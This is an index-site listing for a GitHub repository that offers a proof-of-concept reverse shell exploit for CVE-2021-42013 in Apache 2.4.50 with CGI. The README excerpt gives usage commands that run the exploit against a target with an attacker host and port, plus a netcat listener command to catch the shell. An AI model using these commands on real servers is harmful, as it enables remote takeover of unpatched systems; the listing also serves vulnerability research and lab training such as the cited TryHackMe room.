Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell
Last synced: 22 days ago
JSON representation
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
- Host: GitHub
- URL: https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell
- Owner: TheLastVvV
- Created: 2021-10-24T12:57:55.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-10-24T13:26:02.000Z (about 3 years ago)
- Last Synced: 2024-08-05T17:45:37.671Z (4 months ago)
- Language: Shell
- Size: 3.91 KB
- Stars: 7
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - TheLastVvV/CVE-2021-42013_Reverse-Shell - PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI (Shell)
README
# CVE-2021-42013_Reverse-Shell
PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI
## Usage :```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT```
### More info:
```sh
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
nc -lvnp 9999
```### References
https://nvd.nist.gov/vuln/detail/CVE-2021-42013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
https://tryhackme.com/room/cve202141773